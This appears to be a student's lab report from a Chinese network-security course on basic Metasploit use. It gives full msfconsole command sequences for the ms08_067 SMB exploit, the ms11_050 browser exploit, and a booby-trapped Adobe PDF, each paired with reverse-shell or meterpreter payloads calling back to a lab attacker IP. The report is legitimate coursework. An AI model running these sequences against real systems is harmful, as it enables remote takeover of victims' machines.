zoukankan      html  css  js  c++  java
  • 2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用

    基础问题回答

    用自己的话解释什么是exploit,payload,encode

    exploit:由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞

    payload:攻击载荷,如后门等攻击代码。

    encode:指编码,对我们的程序或代码进行伪装。

    实验内容

    一个主动攻击实践,如ms08_067

    1.启用msf终端msfconsole

    2.然后使用search命令搜索该漏洞对应的模块:search ms08_067

    3.渗透攻击模块路径名为“exploit/windows/smb/ms08_067_netapi” 包含四部分:模块类型、目标平台、目标服务和模块名字。

    use exploit/windows/smb/ms08_067_netapi
    

    1.查看信息:

    show payloads
    

    2.选择攻击载荷:

    set payload generic/shell_reverse_tcp
    

    3.查看配置渗透攻击所需的配置项:

    show options
    

    4.查看渗透攻击模块所能成功渗透攻击的目标平台

    show targets
    

    5.用show payloads查看可以供我们使用的攻击载荷:

    6.从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

    7.用show options查看需要设置的参数

    •这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置:

    8.设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP2,所以选择10)

    •确认参数设置无误后,用exploit指令开始攻击:

    9.攻击成功后会获取靶机的shell,可以对其进行操作:

    一个针对浏览器的攻击,如ms11_050

    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
    
    msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
    
    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.136.130 //攻击机ip
    
    msf exploit(ms11_050_cobjectelement) > set LPORT 5310 //攻击端口固定
    
    msf exploit(ms11_050_cobjectelement) > exploit
    

    用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

    在靶机IE上输入该网址

    kali中显示session 1已经创建,并显示其会话ID

    但是修改Internet的安全设置后失败了!

    一个针对客户端的攻击,如Adobe

    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    msf > use windows/fileformat/adobe_cooltype_sing
    
    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
    
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.136.128 //攻击机ip
    
    msf exploit(adobe_cooltype_sing) > set LPORT 5310 //攻击端口
    
    msf exploit(adobe_cooltype_sing) > set FILENAME 20155310.pdf //设置生成pdf文件的名字
    
    msf exploit(adobe_cooltype_sing) > exploit//攻击
    

    成功生成20155310.pdf:

    将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    msf > use exploit/multi/handler //进入监听模块
    
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
    
    msf exploit(handler) > set LHOST 192.168.136.128 //攻击机ip
    
    msf exploit(handler) > set LPORT 5310 //攻击端口固定
    
    msf exploit(handler) > exploit
    

    然后在靶机上打开20155310.pdf文件

    成功应用任何一个辅助模块

    用show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:

    查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。

    也可以对指定网段的主机进行扫描:

    实践总结及体会

    本次实验可以说是十分艰难了,主要在环境的配置上,自己配置了好久但还是不成功,最后拷了配置好的虚拟机。虽然整体实验流程并不复杂,但是仍然有失败的。通过这次实验感受到了msf工具功能的强大。

  • 相关阅读:
    高效真实的云渲染算法 【转】
    网络字节顺序 【转】
    Windows网络编程 2 【转】
    windows 网络编程[转]
    电信诈骗
    winsock 收发广播包 【转】
    windows核心编程 DLL技术 【转】
    CityEngine结合ArcGIS制作地质体web场景 [转]
    共有49款Windows GUI开发框架开源软件 【转】
    详解分级基金(杠杆基金)【精华】 【转】
  • 原文地址:https://www.cnblogs.com/m20155310/p/8986765.html
Copyright © 2011-2022 走看看